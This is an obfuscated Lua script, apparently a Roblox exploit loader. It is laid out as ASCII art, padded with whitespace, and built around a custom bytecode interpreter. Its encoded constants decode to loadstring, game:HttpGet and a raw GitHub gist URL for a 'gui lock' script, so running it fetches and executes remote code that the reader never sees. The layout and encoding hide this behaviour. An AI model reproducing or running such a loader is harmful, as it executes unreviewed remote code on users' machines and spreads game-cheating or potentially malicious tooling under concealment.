                                                                                 local v0=tonumber;    
                                                                        local v1=string.byte;local v2=string.char;local 
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local 
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=    
                                                            getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall 
                                                          ;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local      
                                                        function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)   
                                                      if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=0;local v81;while    
                                                    true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v105=v5(v81,v19);v19=nil;return 
                                                   v105;else return v81;end break;end end end end);local function v20(v31,v32,v33) if v33 then      
                                                  local v82=(v31/((5 -3)^(v32-(2 -1))))%((3 -(1638 -(1523 + 114)))^(((v33-1) -(v32-(2 -(1 + 0)))) + ( 
                                                620 -(555 + (91 -27))))) ;return v82-(v82%(932 -(857 + 74))) ;else local v83=0;local v84;while true do  
                                                if (v83==(568 -(367 + 201))) then v84=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84)  
                                              and ((1066 -(68 + 997)) + 0)) or ((2147 -(226 + 1044)) -(282 + 595)) ;end end end end local function v21()    
                                              local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 ) 
                                            ;v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23() local v37=0 + 0 ;local v38;    
                                            local v39;local v40;local v41;while true do if (v37==(1 + 0)) then return (v41 * 16777216) + (v40 * (66493 -(892 +  
                                          65))) + (v39 * (610 -354)) + v38 ;end if (v37==(0 -(180 -(67 + 113)))) then v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) );  
                                          v18=v18 + (354 -(87 + 263)) ;v37=1;end end end local function v24() local v42=v23();local v43=v23();local v44=1 + 0 ;     
                                          local v45=(v20(v43,1,49 -29 ) * (2^(24 + 8))) + v42 ;local v46=v20(v43,21,(386 -263) -92 );local v47=((v20(v43,32)==((971 - 
                                          (10 + 8)) -(802 + 150))) and  -1) or 1 ;if (v46==(0 -0)) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else local v88=   
                                        997 -(915 + 82) ;while true do if (v88==(0 -0)) then v46=1 + 0 ;v44=0 -0 ;break;end end end elseif (v46==(3234 -(1069 + 118)))  
                                        then return ((v45==(0 -0)) and (v47 * ((1 -0)/(0 + 0)))) or (v47 *    --[[==============================]]NaN) ;end return v8(v47 
                                        ,v46-(1817 -794) ) * (v44 + (v45/((2 + 0)^((1285 -(416 + 26 --[[============================================]])) -(368 + 423))))) 
                                         ;end local function v25(v48) local v49;if  not v48     --[[======================================================]]then v48=v23(); 
                                      if (v48==(0 -0)) then return "";end end v49=v3(v16,   --[[==========================================================]]v18,(v18 + v48) - 
                                      (1 + 0) );v18=v18 + v48 ;local v50={};for v64=1 -0  --[[==============================================================]], #v49 do v50[  
                                      v64]=v2(v1(v3(v49,v64,v64)));end return v6(v50);end --[[================================================================]] local v26=v23; 
                                      local function v27(...) return {...},v12("#",...);  --[[==================================================================]]end local     
                                      function v28() local v51=0;local v52;local v53;     --[[==================================================================]]local v54;local   
                                     v55;local v56;local v57;while true do if (v51~=(820  --[[====================================================================]]-(436 + 383)) 
                    ) then else v56=v23();v57={};for v89=15 -(9 + 5) ,v56 do local v90=0; --[[====================================================================]]local v91;local 
               v92;local v93;while true do if (0==v90) then v91=0;v92=nil;v90=1;end if (  --[[======================================================================]]v90==1) then  
            v93=nil;while true do if (v91==1) then if (v92==(377 -(85 + 291))) then v93=  --[[======================================================================]]v21()~=(1265  
          -(243 + 1022)) ;elseif (v92==2) then v93=v24();elseif (v92~=3) then else v93=   --[[======================================================================]]v25();end v57 
        [v89]=v93;break;end if (v91~=(0 -0)) then else local v111=0 + 0 ;local v112;while --[[======================================================================]] true do if ( 
        v111==0) then v112=1180 -(1123 + 57) ;while true do if (v112~=0) then else v92=   --[[======================================================================]]v21();v93=nil 
      ;v112=1 + 0 ;end if (v112~=(255 -(163 + 91))) then else v91=1931 -(1869 + 61) ;     --[[======================================================================]]break;end end 
       break;end end end end break;end end end v55[3]=v21();v51=1 + 1 ;end if ((6 -4)==v51) --[[==================================================================]] then for v94=1 
       -0 ,v23() do local v95=0 + 0 ;local v96;while true do if (v95==(0 -0)) then v96=v21( --[[================================================================]]);if (v20(v96,1,1 
    )==0) then local v106=0 + 0 ;local v107;local v108;local v109;while true do if (0==v106 --[[==============================================================]]) then v107=v20(  
    v96,2,1477 -(1329 + 145) );v108=v20(v96,4,977 -(140 + 831) );v106=1;end if (v106==(1853 - --[[==========================================================]](1409 + 441))) then 
     if (v20(v108,721 -(15 + 703) ,3)==(1 + 0)) then v109[442 -(262 + 176) ]=v57[v109[1725 -(   --[[====================================================]]345 + 1376) ]];end v52[ 
    v94]=v109;break;end if (v106==2) then if (v20(v108,689 -(198 + 490) ,1)~=(4 -3)) then else    --[[==============================================]]v109[4 -2 ]=v57[v109[2]]; 
    end if (v20(v108,1208 -(696 + 510) ,2)==(1 -0)) then v109[3]=v57[v109[1265 -(1091 + 171) ]];end   --[[====================================]]v106=1 + 2 ;end if (v106==(3  
    -2)) then local v120=0 -0 ;while true do if (v120~=(375 -(123 + 251))) then else v106=2;break;end if  --[[========================]](v120==0) then local v154=0;while     
    true do if (v154==1) then v120=4 -3 ;break;end if (v154==(698 -(208 + 490))) then v109={v22(),v22(),nil,nil};if (v107==(836 -(660 + 176))) then local v161=0 + 0 ;local 
   v162;while true do if (v161~=0) then else v162=0;while true do if (v162~=(202 -(14 + 188))) then else v109[678 -(534 + 141) ]=v22();v109[4]=v22();break;end end break; 
  end end elseif (v107==1) then v109[2 + 1 ]=v23();elseif (v107==(2 + 0)) then v109[3 + 0 ]=v23() -(2^16) ;elseif (v107==3) then local v167=0;while true do if (v167~=( 
  0 -0)) then else v109[3]=v23() -((2 -0)^16) ;v109[11 -7 ]=v22();break;end end end v154=1;end end end end end end end break;end end end for v97=1 + 0 ,v23() do v53[v97- 
  1 ]=v28();end return v55;end if (v51==0) then v52={};v53={};v54={};v55={v52,v53,nil,v54};v51=2 -1 ;end end end local function v29(v58,v59,v60) local v61=v58[1];local   
  v62=v58[2];local v63=v58[3];return function(...) local v66=v61;local v67=v62;local v68=v63;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local   
  v74=v12("#",...) -1 ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + 1 ];end end local v77=(v74-v68)  
  + 1 ;local v78;local v79;while true do local v86=0;while true do if (1==v86) then if (v79<=6) then if (v79<=2) then if (v79<=0) then local v113=v78[2];local v114,v115= 
  v69(v76[v113](v13(v76,v113 + 1 ,v78[3])));v71=(v115 + v113) -1 ;local v116=0;for v121=v113,v71 do local v122=0;while true do if (v122==0) then v116=v116 + 1 ;v76[v121] 
  =v114[v116];break;end end end elseif (v79==1) then local v123=v78[2];v76[v123]=v76[v123](v13(v76,v123 + 1 ,v71));else v76[v78[2]]();end elseif (v79<=4) then if (v79==3 
  ) then local v125=v78[2];local v126=v76[v78[3]];v76[v125 + 1 ]=v126;v76[v125]=v126[v78[4]];else do return;end end elseif (v79>5) then local v130=v78[2];local v131=v76[ 
  v78[3]];v76[v130 + 1 ]=v131;v76[v130]=v131[v78[4]];else local v135=0;local v136;local v137;local v138;local v139;while true do if (v135==1) then v71=(v138 + v136) -1 ; 
  v139=0;v135=2;end if (0==v135) then v136=v78[2];v137,v138=v69(v76[v136](v13(v76,v136 + 1 ,v78[3])));v135=1;end if (v135==2) then for v158=v136,v71 do v139=v139 + 1 ;v76[ 
  v158]=v137[v139];end break;end end end elseif (v79<=9) then if (v79<=7) then v76[v78[2]]=v78[3];elseif (v79>8) then v76[v78[2]]=v78[3];else v76[v78[2]]=v60[v78[3]];end   
  elseif (v79<=11) then if (v79==10) then v76[v78[2]]=v60[v78[3]];else do return;end end elseif (v79>12) then local v146=v78[2];v76[v146]=v76[v146](v13(v76,v146 + 1 ,v71)) 
  ;else v76[v78[2]]();end v70=v70 + 1 ;break;end if (0==v86) then v78=v66[v70];v79=v78[1];v86=1;end end end end;end return v29(v28(),{},v17)(...);end return v15(           
                                                                                                                                                                            
                                                                                                                                                                            
                                                                                                                                                                            
                                                                                                                                                                            
                                                                                                                                                                            
                                                                                                                                                                            
                                                                                                                                                                            
                                                                                                                                                                            
                                                                                                                                                                            
                                                                                                                                                                          
                                                                                                                                                                          
                                                                                                                                                                          
                                                                                                                                                                          
                                                                                                                                                                          
                                                                                                                                                                          
                                                                                                                                                                          
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                      
                                                                                                                                                                      
                                                                                                                                                                      
                                                                                                                                                                      
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                              
                                                                                                                                                              
                                                                                                                                                            
                                                                                                                                                            
                                                                                                                                                          
                                                                                                                                                      
                                                                                                                                                  
                                                                                                                                          
                                                                                            
                                                                                          
                                                                                        
                                                                                  


--------------------------------------------------------------------------------
"LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574039E3O00682O7470733A2O2F676973742E67697468756275736572636F6E74656E742E636F6D2F7469656664656A2F6638363933612O6634633430332O3061633638336164613732393031383463612F7261772F356561332O612O6435313738653833636631366166636465663764386537623164353032383064342F74696566253235323067756925323532306C6F636B25323532306F7025323532307365747300083O0012083O00013O001208000100023O002006000100010003001209000300046O000100034O00015O00022O00023O000100012O000B3O00017O00",v9(),...);
